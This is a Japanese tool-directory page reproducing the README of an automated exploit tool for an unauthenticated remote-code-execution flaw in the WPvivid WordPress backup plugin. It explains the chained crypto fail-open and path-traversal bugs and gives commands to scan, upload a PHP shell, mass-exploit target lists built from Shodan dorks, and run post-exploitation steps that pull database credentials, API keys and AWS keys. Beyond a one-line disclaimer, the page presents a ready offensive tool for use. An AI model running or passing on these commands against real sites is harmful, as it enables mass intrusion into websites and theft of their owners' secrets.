Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1357-POC — CVE-2026-1357(WPvivid Backup & Migration における未認証RCE)向けの自動エクスプロイトツール。WordPressターゲットをスキャンし、WAF/403をバイパスして、パストラバーサル経由でシェルをアップロードし、レポート生成を伴うポストエクスプロイテーション偵察を実行します。 | Kitploit
ツール/GitHubGitHub/cybertechajju/cve-2026-1357-poc
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用データ流出ポストエクスプロイトWAFバイパスペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
cybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

CVE-2026-1357(WPvivid Backup & Migration における未認証RCE)向けの自動エクスプロイトツール。WordPressターゲットをスキャンし、WAF/403をバイパスして、パストラバーサル経由でシェルをアップロードし、レポート生成を伴うポストエクスプロイテーション偵察を実行します。

リポジトリを見る
91137ヶ月前未レビュー

CVE-2026-1357 — WPvivid Backup & Migration RCE

CVE クレジット: Lucas Montes (NiRoX)
ツール作成者: CyberTechAjju
CVSS: 9.8 (Critical) | 影響を受けるバージョン: ≤ 0.9.123 | 修正済み: 0.9.124


⚠️ 免責事項

許可されたセキュリティテスト専用です。システムへの不正アクセスは違法です。


概要

WPvivid Backup & Migration における、2つの連鎖するバグによる認証なし RCE:

  1. Crypto Fail-Open — openssl_private_decrypt() が不正なキーで false を返す → phpseclib v1 がそれを null バイト AES キーとして扱う → 攻撃者は16個の null バイトで暗号化する
  2. Path Traversal — サニタイズされていない name フィールド → ../uploads/shell.php がバックアップディレクトリを脱出する

制約: wpvivid_api_token が生成され、有効期限内の場合のみ悪用可能。


機能


インストール

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

使用方法

root@kitploit:~
# スキャンのみ (WordPress + WPvivid + バージョンを検出)
python3 cve_2026_1357.py -u http://target.com

# スキャン + エクスプロイト + 自動ポストエクスプロイテーション
python3 cve_2026_1357.py -u http://target.com --exploit

# ポストエクスプロイト偵察なしでエクスプロイト
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# レポート付きマススキャン
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# Burp プロキシ経由
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# ペイロードのみモード
python3 cve_2026_1357.py -u http://x --payload-only

全オプション

root@kitploit:~
-u, --url         単一ターゲット URL
-l, --list        URL を含むファイル (1行に1つ)
--exploit         エクスプロイトモードを有効化
--shell NAME      シェルファイル名 (デフォルト: pwn_remote.php)
--no-post         ポストエクスプロイト偵察をスキップ
--report         Markdown PoC レポートを生成
--report-dir DIR  レポート出力ディレクトリ
-t, --threads N   同時スレッド数 (デフォルト: 5)
--timeout SECS    リクエストタイムアウト (デフォルト: 10)
--proxy URL       Burp 用 HTTP プロキシ
--payload-only    base64 ペイロードを出力して終了
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

ターゲット発見 (Dorks)

完全なリストは dorks.md を参照。クイック版:

root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# パイプライン
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

ファイル

root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py    ← メインツール (スキャナー + エクスプロイター + ポストエクスプロイト)
├── dorks.md            ← Shodan/Google/Censys/FOFA/ZoomEye dorks
├── requirements.txt    ← Python 依存関係
├── .gitignore
└── README.md           ← このファイル

クレジット

Lucas Montes (NiRoX) — CVE 発見
CyberTechAjju — エクスプロイトツール

ツールをダウンロード
機能説明
🔍 自動検出WordPress + WPvivid プラグイン + バージョンのフィンガープリンティング
🛡️ WAF バイパスUser-Agent ローテーション、ヘッダースプーフィング、エンコーディングトリック
🔓 403 バイパスX-Forwarded-For、X-Original-URL、パス正規化、二重エンコーディング
💀 自動エクスプロイトNull キー AES ペイロード + パストラバーサルアップロード
📋 ポストエクスプロイト20以上の偵察コマンドを自動実行 (id、whoami、passwd、wp-config、SUID など)
🔑 データ抽出出力から DB 認証情報、API キー、パスワード、AWS キーを抽出
📊 レポート生成完全なエクスプロイト証拠付き Markdown PoC レポート
⚡ マススキャンプロキシ/Burp サポート付きマルチスレッド